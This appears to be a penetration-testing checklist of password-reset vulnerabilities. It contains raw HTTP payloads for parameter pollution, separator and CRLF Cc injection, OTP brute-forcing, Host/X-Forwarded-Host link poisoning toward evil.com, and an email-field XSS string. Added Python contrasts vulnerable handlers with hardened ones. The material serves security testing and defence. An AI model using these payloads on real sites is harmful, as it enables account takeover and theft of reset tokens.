Some common bugs in the forgot password / reset password functionality
- Parameter pollution
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com&email=attacker@mail.com
If the back end keeps the last value, or mails every value, the reset link also reaches the attacker. Swap the order as well: some frameworks keep the first value, others the last.
- Bruteforce the OTP code
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com&code=$123456$
Mark the code as the payload position ($...$ here, the Intruder marker in Burp) and iterate 000000-999999. This only works when the code has no attempt limit, no rate limit and no short expiry; check all three.
- Host header injection
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com
to
POST /reset HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
...
email=victim@mail.com
If the application builds the reset link from the Host or X-Forwarded-Host header, the victim receives a link pointing at evil.com, and clicking it sends the reset token to the attacker's server log. Also try changing Host itself to evil.com, and confirm the poisoned link in a mail sent to your own account before reporting.
- Using a separator in the value of the parameter
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com,attacker@mail.com
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%20attacker@mail.com
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com|attacker@mail.com
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%00attacker@mail.com
Also try %09 (tab), %0a and %0d%0a as separators. The goal is a value that the account lookup still resolves to the victim while the mail library treats it as a list of two recipients.
- No domain in the value of the parameter
POST /reset HTTP/1.1
Host: target.com
...
email=victim
- No TLD in the value of the parameter
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail
Check whether the address format is validated server-side at all (client-side validation is bypassed simply by sending the request directly) and how an incomplete address is resolved to an account.
- Using carbon copy (mail header injection through the address)
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%0a%0dcc:attacker@mail.com
If the address is written into the mail headers unescaped, the injected line adds attacker@mail.com as a Cc recipient of the reset mail. Try the standard CRLF order %0d%0a as well, and bcc: in place of cc:.
- If the request body is JSON, add a comma to split the value
POST /newaccount HTTP/1.1
Host: target.com
...
{"email":"victim@mail.com","attacker@mail.com","token":"xxxxxxxxxx"}
A lenient parser may accept the malformed body; with a strict parser, repeat the key instead ("email" twice), since most JSON parsers keep the last duplicate value.
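The items above (parameter pollution, separators, missing domain or TLD, Cc injection, the duplicate-key JSON variant, and the Host / X-Forwarded-Host reset-link poisoning) all come down to two handler mistakes: trusting the submitted recipient string and trusting request headers for the link. The following is an added example, not code from the original page: a vulnerable recipient/link builder beside a hardened one, with a constructed user table, an assumed canonical origin and assumed function names. The hardened path requires exactly one value, applies a strict single-address pattern, and mails the address stored for the matching user rather than the submitted string.

```python
import json
import re
from urllib.parse import parse_qs, urlparse

# Constructed stand-ins for the application's user table and its configured
# public origin (both are assumptions for this example).
USERS_BY_EMAIL = {"victim@mail.com": {"id": 7, "email": "victim@mail.com"}}
CANONICAL_ORIGIN = "https://target.com"

# Exactly one address: no commas, pipes, whitespace, control characters or
# quoted local part, and the domain must end in a TLD.
STRICT_EMAIL = re.compile(
    r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}"
)

FORM_CT = "application/x-www-form-urlencoded"
JSON_CT = "application/json"


def _reject_duplicate_keys(pairs):
    """object_pairs_hook that refuses duplicate keys instead of keeping the last."""
    keys = [key for key, _ in pairs]
    if len(keys) != len(set(keys)):
        raise ValueError("duplicate key in JSON object")
    return dict(pairs)


def vulnerable_recipients(body, content_type=FORM_CT):
    """The buggy pattern: whatever arrives in `email` becomes the To: header.
    Returns the recipient string the mailer would be handed."""
    if content_type == JSON_CT:
        # json.loads keeps the last duplicate key, so the attacker's value wins.
        return json.loads(body)["email"]
    # Joining every value models a handler that mails all of them; one that
    # picks params["email"][-1] is just as bad.
    return ", ".join(parse_qs(body).get("email", []))


def hardened_recipient(body, content_type=FORM_CT):
    """Return the address stored for exactly one known user, or None."""
    if content_type == JSON_CT:
        try:
            data = json.loads(body, object_pairs_hook=_reject_duplicate_keys)
        except ValueError:            # malformed body or duplicate key
            return None
        value = data.get("email") if isinstance(data, dict) else None
        values = [value] if isinstance(value, str) else []
    else:
        values = parse_qs(body, keep_blank_values=True).get("email", [])
    if len(values) != 1:
        return None                   # parameter pollution: refuse, do not pick one
    candidate = values[0].lower()
    if not STRICT_EMAIL.fullmatch(candidate):
        return None                   # separators, CRLF/cc:, missing domain or TLD
    user = USERS_BY_EMAIL.get(candidate)
    if user is None:
        return None                   # caller must answer identically to avoid enumeration
    return user["email"]              # mail the stored address, never the submitted string


def vulnerable_reset_link(headers, token):
    """Builds the link from request headers, so X-Forwarded-Host (or Host)
    decides where the victim's token is sent."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    return f"https://{host}/reset?token={token}"


def hardened_reset_link(token):
    """Builds the link from configuration; request headers play no part."""
    return f"{CANONICAL_ORIGIN}/reset?token={token}"


def link_host(link):
    """Host component of a reset link, for checking where the token would go."""
    return urlparse(link).netloc


if __name__ == "__main__":
    evil = {"Host": "target.com", "X-Forwarded-Host": "evil.com"}
    print(vulnerable_recipients("email=victim@mail.com&email=attacker@mail.com"))
    print(hardened_recipient("email=victim@mail.com&email=attacker@mail.com"))
    print(link_host(vulnerable_reset_link(evil, "tok")), link_host(hardened_reset_link("tok")))
```

The strict pattern also rejects the quoted-local-part XSS payload from the last item, because a double quote is not in the allowed local-part characters. The JSON branch shows the duplicate-key variant rather than the page's comma-split body, because Python's json module rejects the malformed body outright and keeps the last value of a repeated key.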
- Find out how the tokens are generated
Request several resets for accounts you control and compare the tokens. Check whether they are:
- Generated based on a timestamp
- Generated based on the ID of the user
- Generated based on the email of the user
- Generated based on the name of the user
Also look for plain base64 or hex encodings of those values, an MD5/SHA1 hash of them, and short or sequential tokens. A token that can be computed from public data means a reset for any account without access to its mailbox.
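As an added example (not code from the original page), the following Python compares a token received for your own account against the derivations listed above and the encodings a practitioner would also try, then shows what a sound implementation looks like: a random token from the OS CSPRNG stored only as a hash, and an OTP check with an attempt cap that closes the brute-force item from earlier on the page. The account values, function names and the +/- 5 second timestamp window are assumptions for the example.

```python
import hashlib
import hmac
import secrets
import time
from base64 import b64encode

# Constructed values for an account you control; used to test the guesses.
VICTIM = {"user_id": 7, "email": "victim@mail.com", "name": "victim"}


def weak_timestamp_token(issued_ms):
    """Token derived from the request time in milliseconds. Anyone who knows
    roughly when the reset was requested enumerates a small window of values."""
    return hashlib.md5(str(issued_ms).encode()).hexdigest()


def weak_identity_token(value):
    """Token derived from a user attribute (ID, email or name). Anyone who
    knows the attribute computes the token without ever seeing the mail."""
    return hashlib.md5(str(value).encode()).hexdigest()


def guess_scheme(token, user, issued_ms, window_ms=5000):
    """Return the derivation that reproduces `token`, or None. The timestamp
    check assumes the token was issued within +/- window_ms of issued_ms."""
    for label in ("user_id", "email", "name"):
        raw = str(user[label]).encode()
        candidates = {
            f"plain {label}": raw.decode(),
            f"hex {label}": raw.hex(),
            f"base64 {label}": b64encode(raw).decode(),
            f"md5 {label}": hashlib.md5(raw).hexdigest(),
            f"sha1 {label}": hashlib.sha1(raw).hexdigest(),
        }
        for how, candidate in candidates.items():
            if candidate == token:
                return how
    for t in range(issued_ms - window_ms, issued_ms + window_ms + 1):
        stamp = str(t).encode()
        if token == stamp.decode():
            return f"plain timestamp {t}"
        if token == hashlib.md5(stamp).hexdigest():
            return f"md5 timestamp {t}"
    return None


def issue_secure_token():
    """What the handler should do instead: 32 random bytes from the OS CSPRNG.
    Only the SHA-256 of the token is stored, so reading the database does not
    yield usable tokens; the plaintext goes into the mail once."""
    token = secrets.token_urlsafe(32)
    return token, hashlib.sha256(token.encode()).hexdigest()


def verify_token(presented, stored_hash):
    """Constant-time comparison of the presented token against the stored hash."""
    digest = hashlib.sha256(presented.encode()).hexdigest()
    return hmac.compare_digest(digest, stored_hash)


class OtpVerifier:
    """Server-side check for a 6-digit code: a hard cap on attempts, a short
    lifetime and single use make enumerating 10^6 codes infeasible."""

    MAX_ATTEMPTS = 5

    def __init__(self, code, ttl_s=600, now=time.time):
        self._code = code
        self._now = now
        self._expires_at = now() + ttl_s
        self.attempts = 0

    def check(self, presented):
        if self._code is None or self._now() > self._expires_at:
            return False                  # already used or expired
        if self.attempts >= self.MAX_ATTEMPTS:
            return False                  # locked: a new code must be requested
        self.attempts += 1
        if not isinstance(presented, str) or not presented.isascii():
            return False                  # compare_digest needs ASCII str input
        if hmac.compare_digest(presented, self._code):
            self._code = None             # single use
            return True
        return False


if __name__ == "__main__":
    issued = 1_700_000_000_123
    print(guess_scheme(weak_identity_token(VICTIM["email"]), VICTIM, issued))
    print(guess_scheme(weak_timestamp_token(issued), VICTIM, issued - 400))
    token, stored = issue_secure_token()
    print(guess_scheme(token, VICTIM, issued), verify_token(token, stored))
```

Run guess_scheme against a token from your own account with the approximate request time taken from the mail's Date header; a non-None result is the finding. The 10001-step timestamp loop costs a few milliseconds, so widening the window to cover clock skew is cheap.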
- Try Cross-Site Scripting (XSS) in the form
Sometimes the email is reflected in the forgot password page (or in the mail itself), so try an XSS payload in the local part. The quotes make it a syntactically valid address, so it passes validators that only check the address format:
"<svg/onload=alert(1)>"@gmail.com